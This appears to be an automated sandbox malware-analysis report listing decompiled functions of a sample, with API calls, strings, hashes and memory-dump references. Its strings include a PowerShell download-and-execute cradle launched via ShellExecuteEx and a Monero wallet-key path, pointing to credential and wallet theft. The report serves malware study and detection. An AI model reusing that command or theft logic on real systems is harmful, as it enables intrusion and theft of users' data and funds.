                                  Function 007292E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(:r,80000000,00000003,00000000,00000003,00000080,00000000,?,00723AEE,?), ref: 007292FC
                                  • GetFileSizeEx.KERNEL32(000000FF,:r), ref: 00729319
                                  • CloseHandle.KERNEL32(000000FF), ref: 00729327
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID: :r$:r
                                  • API String ID: 1378416451-1407874444
                                  • Opcode ID: 7e43185ff1230b724ee7d4063b53c120cf10bbf7e90031708ae1f9a0952825b0
                                  • Instruction ID: d7c5055974e1dc4d7262299d4841b7f2ba416a14c7fe0fa5103f8fe889b9f304
                                  • Opcode Fuzzy Hash: 7e43185ff1230b724ee7d4063b53c120cf10bbf7e90031708ae1f9a0952825b0
                                  • Instruction Fuzzy Hash: 24F04935E54308BBDB10DFB1EC49F9E7BB9AB48721F10C254BA51A72C0D674AA019B84
                                  Function 007199C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007199EC
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00719A11
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00719A31
                                  • ReadFile.KERNEL32(000000FF,?,00000000,0071148F,00000000), ref: 00719A5A
                                  • LocalFree.KERNEL32(0071148F), ref: 00719A90
                                  • CloseHandle.KERNEL32(000000FF), ref: 00719A9A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: e0b184b6df0eb6623c3de1d3adec592acf96873dcb286d55aa573aac49cc70bd
                                  • Instruction ID: 32c76dba82d483fc1056dea92fc5af1689620685bd7448a4b7def2378074e9a3
                                  • Opcode Fuzzy Hash: e0b184b6df0eb6623c3de1d3adec592acf96873dcb286d55aa573aac49cc70bd
                                  • Instruction Fuzzy Hash: 30312B74A00209EFDB14CF95D895BEE77B5FF48301F108158EA01A72D0D779A986CFA1
                                  Function 00724780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcat.KERNEL32(?,0122F130), ref: 007247DB
                                    • Part of subcall function 00728DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00728E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00724801
                                  • lstrcat.KERNEL32(?,?), ref: 00724820
                                  • lstrcat.KERNEL32(?,?), ref: 00724834
                                  • lstrcat.KERNEL32(?,0121C288), ref: 00724847
                                  • lstrcat.KERNEL32(?,?), ref: 0072485B
                                  • lstrcat.KERNEL32(?,0122E960), ref: 0072486F
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 00728D90: GetFileAttributesA.KERNEL32(00000000,?,00711B54,?,?,0073564C,?,?,00730E1F), ref: 00728D9F
                                    • Part of subcall function 00724570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00724580
                                    • Part of subcall function 00724570: RtlAllocateHeap.NTDLL(00000000), ref: 00724587
                                    • Part of subcall function 00724570: wsprintfA.USER32 ref: 007245A6
                                    • Part of subcall function 00724570: FindFirstFileA.KERNEL32(?,?), ref: 007245BD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID:
                                  • API String ID: 2540262943-0
                                  • Opcode ID: 251b435de145391fd3459d8968631ea17be0e786e3706915ee1432534412ef38
                                  • Instruction ID: b1adcf093e66d75859e4739eb73ce4bba580be9391399d90ebf8320a4f418a1f
                                  • Opcode Fuzzy Hash: 251b435de145391fd3459d8968631ea17be0e786e3706915ee1432534412ef38
                                  • Instruction Fuzzy Hash: 163164B2910318A7CB54F7B0EC89EED737CBB58700F404589B35596081EE79ABC9CB96
                                  Function 00722C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00722D85
                                  Strings
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00722D04
                                  • ')", xrefs: 00722CB3
                                  • <, xrefs: 00722D39
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00722CC4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: 3c3a9f8e4c7585745e3c2b0a2db62273a375c56425f3247cc300312467788e67
                                  • Instruction ID: 5e52f8cfe2f45346318dfed675feb8dba79b28660a480553df35cf37b97e2bfb
                                  • Opcode Fuzzy Hash: 3c3a9f8e4c7585745e3c2b0a2db62273a375c56425f3247cc300312467788e67
                                  • Instruction Fuzzy Hash: 7641DF71D10218EBDB15FFA0E89ABDDB774AF14300F404169F106A7192DF786A4ACF92
                                  Function 00719E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00719F41
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$AllocLocal
                                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                  • API String ID: 4171519190-1096346117
                                  • Opcode ID: 0ba0f3150525cc17db3314fca0f69f5c14bc3ce832af1516563b2466de40b3d7
                                  • Instruction ID: 04babf74fffc4969d4eebf33be43e10a055c41b6ff6c91bf0dfb2044e1b8b397
                                  • Opcode Fuzzy Hash: 0ba0f3150525cc17db3314fca0f69f5c14bc3ce832af1516563b2466de40b3d7
                                  • Instruction Fuzzy Hash: 38612371A10258EFDB14EFA8DC9AFED77B5AF44300F408118F90A5F191EB786A45CB92
                                  Function 007240B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,0122E8C0,00000000,00020119,?), ref: 007240F4
                                  • RegQueryValueExA.ADVAPI32(?,0122F040,00000000,00000000,00000000,000000FF), ref: 00724118
                                  • RegCloseKey.ADVAPI32(?), ref: 00724122
                                  • lstrcat.KERNEL32(?,00000000), ref: 00724147
                                  • lstrcat.KERNEL32(?,0122F058), ref: 0072415B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 690832082-0
                                  • Opcode ID: 6d1a34aaabd4f62e3d2f86e25ebfca92701a230168980c546b60a193fdc851b2
                                  • Instruction ID: 6fe56f7d6d3c1518bf25f8f3d7fa0d7b43a31bb8e605aad8f4cdcf3cba97b7cf
                                  • Opcode Fuzzy Hash: 6d1a34aaabd4f62e3d2f86e25ebfca92701a230168980c546b60a193fdc851b2
                                  • Instruction Fuzzy Hash: 7D418BB6D10208ABDB14EBA0EC5AFFE777DAB4C300F404658B71557181EA795B888BD2
                                  Function 00727E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00727E37
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00727E3E
                                  • RegOpenKeyExA.ADVAPI32(80000002,0121CC70,00000000,00020119,?), ref: 00727E5E
                                  • RegQueryValueExA.ADVAPI32(?,0122E860,00000000,00000000,000000FF,000000FF), ref: 00727E7F
                                  • RegCloseKey.ADVAPI32(?), ref: 00727E92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: c91cad2f2ba3713e1e544366178d1aac1673cff5a7c1ab33bcb432b93dff9a5f
                                  • Instruction ID: c36658bca37337604a4243a0ebacd37743a6d98b14f40e79b2ea15ac98d8882e
                                  • Opcode Fuzzy Hash: c91cad2f2ba3713e1e544366178d1aac1673cff5a7c1ab33bcb432b93dff9a5f
                                  • Instruction Fuzzy Hash: 80114FB1A58305EBD714CF95ED49F7BBBB8FB08711F104259F605A7290D7785800DBA1
                                  Function 00729260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • StrStrA.SHLWAPI(0122EE90,?,?,?,0072140C,?,0122EE90,00000000), ref: 0072926C
                                  • lstrcpyn.KERNEL32(0095AB88,0122EE90,0122EE90,?,0072140C,?,0122EE90), ref: 00729290
                                  • lstrlen.KERNEL32(?,?,0072140C,?,0122EE90), ref: 007292A7
                                  • wsprintfA.USER32 ref: 007292C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  • Opcode ID: 7394699ac05e4c420f426a3766280587c56a9378078d4dc6a8122af9bd7983b7
                                  • Instruction ID: 47574b28fa524e03fdda9268152e66b24dcb51fdfe2cc4b9a90ef5ac0dfff4d8
                                  • Opcode Fuzzy Hash: 7394699ac05e4c420f426a3766280587c56a9378078d4dc6a8122af9bd7983b7
                                  • Instruction Fuzzy Hash: 93011E75904208FFCB04DFEDD984EAE7BB9FB48365F148248F9098B204C635AA40DBD5
                                  Function 007112A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007112B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007112BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007112D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007112F5
                                  • RegCloseKey.ADVAPI32(?), ref: 007112FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: e0672cbd6dd47d566ff037faa7f0c8dd77c614faff900d81ccd29dfa627675f5
                                  • Instruction ID: 5833e2932c3902648962ce664ecb7c1e6f0f794771c4ed4429f22fd5c5cb17e6
                                  • Opcode Fuzzy Hash: e0672cbd6dd47d566ff037faa7f0c8dd77c614faff900d81ccd29dfa627675f5
                                  • Instruction Fuzzy Hash: EA011DB9A54308BBDB00DFE5DC49FAEB7B8EB48701F008259FB0597280D6749A019B55
                                  Function 0072C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
